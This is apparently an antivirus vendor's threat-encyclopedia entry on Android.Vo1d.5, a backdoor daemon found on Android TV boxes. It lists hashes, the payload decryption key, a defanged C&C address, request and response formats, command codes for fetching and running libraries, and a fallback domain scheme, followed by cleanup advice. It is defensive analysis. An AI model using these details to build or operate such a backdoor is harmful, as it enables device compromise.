Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Android.Vo1d.5

Added to the Dr.Web virus database: 2024-07-26

Virus description added:

SHA1 hashes:

  • ed975255eba30345de74936e24b9b3090f26ed7e (/data/google/daemon)
  • 182939085a9aa1d6f0e60da31b200cd644522748 (a decrypted payload)

Description

This is a component of the malicious backdoor Android.Vo1d, which was detected in the system storage area of a number of Android-based TV box models. It is a daemon that performs various tasks on infected devices. Its functionality includes:

  • Decrypting the payload;
  • Communicating with the C&C server;
  • Downloading APK files (presumably);
  • Downloading and running native libraries.

Operating routine

Decrypting the payload

Android.Vo1d.5 extracts and decrypts a payload from itself, using the XXTEA algorithm with the key fPNH830ES23QOPIM*&S955(2WR@L*&GF. The decrypted object—the main Android.Vo1d.5 body—is loaded into the RAM.

Communicating with the C&C server

Via a POST request, Android.Vo1d.5 contacts the C&C server whose address is taken from a preassigned list. By default, the list has only a single address hxxp[:]//meiboot[.]com/api/config.

The request format is as follows:

POST hxxp[:]//meiboot[.]com/api/config
User-Agent curl/7.64.0
Accept */*
Content-Type application/json;charset=UTF-8

An example of a request:


{
    "a": "32",
    "m": "debuggerd-11236.0",
    "s": "10",
    "u": "a1d4f55f6be3d743497fadee1d574b3357029c25"
}

where:

  • a — is a constant;
  • m — is a field that contains a string with information about the trojan’s process name as well as its pid and uid in <process_name>-<pid>.<uid> format;
  • s — is a constant;
  • u — is a session key that will encrypt the u and d fields (the latter is an URL) in responses from the server (these responses are described below).

The server responds with a JSON in one of several formats.

An example of response #1:


{
    "code": "200",
    "msg": [
        {
            "i": "",
            "v": "",
            "a": "",
            "u": ""
        },
        { ... }
    ]
}

where:

  • i — is the identifier of the loaded file;
  • v — is the identifier of the loaded file’s version;
  • a — is the request code;
  • u — is a link (encrypted with XXTEA) for downloading the file.

This response contains the list of commands that the trojan needs to execute.

Possible commands that can be issued by the C&C server:

  • 1 — download a file from the URL specified in the field u and put it in /data/system/users/.v/<id1>.<id2>;
  • 2 — re-download the file specified in the id i;
  • 3 — delete the file specified in the id i;
  • 4 — download the file from the specified URL and put it in the table, using the id i;
  • 5 — place the file in the table, using the id i.

The table above is a list of downloaded files, which the daemon goes through in another thread. Then it decrypts the downloaded files and puts the decrypted variants into one of the following directories:

  • /data/system/android.hardware.support@<id>.0.so (for Android API below version 29);
  • <prefix>/lib/arm/libsupport@<id>.0.so

Next, Android.Vo1d.5 launches these files by calling the function init in the .SO files.

An example of response #2:

{
    "code": "200",
    "msg": {
        "i": "",
        "d": [
            "url_1",
            "url_2",
            "...",
            "url_n"
        ]
    }
}

where:

  • i — the interval between server requests;
  • d — the list of C&C server addresses. Each string in this list is encrypted with the XXTEA algorithm, using the session key from the request.

This command is used to add more C&C server addresses for the daemon to communicate with.

Replenishing the C&C server address list locally

If Android.Vo1d.5 is unable to connect to any of the servers listed in the address table, the trojan generates several addresses on its own using the following scheme:

Server address Domain
0a597f79d876441d . com
57fd438a26874780 xyz
1e93c45d9b414092 top
111a2e0d676a4e94 net

Android.Vo1d.5 uses a random server address, adds a random domain to it, and then tries to connect to the address it generated. The trojan’s authors likely planned to register such addresses so that the daemons could continue operating if any C&C server addresses got blocked.

Artifacts

The Android.Vo1d.5 daemon contains the following strings:

  • C:/Users/dazhi/Desktop/dynamicbox/libsdk/external/libserver/server.c
  • C:/Users/dazhi/Desktop/dynamicbox/libsdk/external/libserver/record_stream.c

Indicators of compromise

News article about the trojan

Recommandations pour le traitement


Android

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile le produit antivirus gratuit Dr.Web для Android Light. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur une violation grave de la loi ou une demande de rançon s’affichent sur l'écran de l'appareil mobile), procédez comme suit :
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil contaminé le produit antivirus gratuit Dr.Web для Android Light et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android